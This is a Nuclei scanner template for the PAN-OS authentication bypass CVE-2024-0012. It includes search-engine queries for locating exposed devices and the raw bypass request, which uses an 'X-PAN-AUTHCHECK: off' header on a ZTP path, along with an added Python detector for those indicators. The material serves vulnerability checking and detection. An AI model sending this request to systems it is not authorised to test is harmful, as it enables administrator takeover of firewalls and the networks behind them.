id: CVE-2024-0012

info:
  name: PAN-OS Management Web Interface - Authentication Bypass
  author: johnk3r,watchtowr
  severity: critical
  description: |
    An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities.
  impact: |
    Unauthenticated attackers with network access to the management interface can bypass authentication to gain full administrator privileges, allowing them to tamper with configurations, exploit additional vulnerabilities, and completely compromise the Palo Alto firewall and connected networks.
  remediation: |
    Upgrade to the latest patched version of PAN-OS as specified in the vendor security advisory.
  reference:
    - https://security.paloaltonetworks.com/CVE-2024-0012
    - https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-0012
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-0012
    cwe-id: CWE-306
    epss-score: 0.94285
    epss-percentile: 0.99943
    cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: paloaltonetworks
    product: pan-os
    fofa-query: icon_hash="-631559155"
    shodan-query:
      - cpe:"cpe:2.3:o:paloaltonetworks:pan-os"
      - http.favicon.hash:"-631559155"
  tags: cve,cve2024,paloalto,globalprotect,kev,vkev,vuln

http:
  - raw:
      - |
        GET /php/ztp_gate.php/.js.map HTTP/1.1
        Host: {{Hostname}}
        X-PAN-AUTHCHECK: off

    matchers:
      - type: dsl
        dsl:
          - 'contains_any(body, "Zero Touch Provisioning", "Zero Touch Provisioning (ZTP)")'
          - 'contains(body, "/scripts/cache/mainui.javascript")'
          - 'contains(header, "PHPSESSID=")'
          - 'status_code == 200'
        condition: and
# digest: 490a00463044022038da5930df0d7e9cfd6776c02a64f5e0577ed00056e1bfa4663a522fcbf46a6702206439f42e653968a502edc5b1f3db3cadd295463204d60c78c0cebce1e4138550:922c64590222798bb761d5b6d8e72950
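Added detection example, not part of this Nuclei template or of ProjectDiscovery's code: a Python helper that inspects a logged request line plus headers (assumes a hypothetical reverse proxy or WAF in front of the management interface that records request headers) and reports the two indicators the probe above relies on, the `X-PAN-AUTHCHECK: off` header and a `/php/*.php/` path carrying a fake static-asset suffix; the path rule generalises the template's single `.js.map` probe to other asset-like suffixes, which is an assumption of this example. The sample requests are constructed, not captured traffic.

```python
import re
from typing import Dict, List

# Path rule: a PHP script under /php/ followed by a "/" and a static-asset-looking
# suffix (the template's probe uses /php/ztp_gate.php/.js.map). Generalised here
# to several suffixes as an assumption of this example.
PHP_PATH_WITH_STATIC_SUFFIX = re.compile(
    r"^/php/[^?\s]+\.php/[^?\s]*\.(?:js|css|map|png|gif|jpg|ico|svg)(?:\?|$)",
    re.IGNORECASE,
)


def flag_request(request_line: str, headers: Dict[str, str]) -> List[str]:
    """Return the indicator names matched by one request (empty list if benign)."""
    reasons: List[str] = []
    parts = request_line.split()
    path = parts[1] if len(parts) >= 2 else ""
    if PHP_PATH_WITH_STATIC_SUFFIX.match(path):
        reasons.append("php-path-with-static-suffix")
    # Header names are case-insensitive (RFC 9110); normalise name and value.
    lowered = {k.lower(): v.strip().lower() for k, v in headers.items()}
    if lowered.get("x-pan-authcheck") == "off":
        reasons.append("x-pan-authcheck-off")
    return reasons


# Constructed sample requests for a stand-alone run (hypothetical host name).
SAMPLES = [
    ("GET /php/ztp_gate.php/.js.map HTTP/1.1",
     {"Host": "fw.example.internal", "X-PAN-AUTHCHECK": "off"}),
    ("GET /php/login.php HTTP/1.1", {"Host": "fw.example.internal"}),
    ("GET /js/main.js.map HTTP/1.1", {"Host": "fw.example.internal"}),
]


def scan(samples=SAMPLES) -> Dict[str, List[str]]:
    """Map each suspicious request line to its matched indicators; benign ones are dropped."""
    hits: Dict[str, List[str]] = {}
    for line, hdrs in samples:
        reasons = flag_request(line, hdrs)
        if reasons:
            hits[line] = reasons
    return hits


if __name__ == "__main__":
    for line, reasons in scan().items():
        print(line, "->", ", ".join(reasons))
```

Either indicator on its own is worth an alert on a management interface that should not be reachable from untrusted networks; both together match the probe exactly.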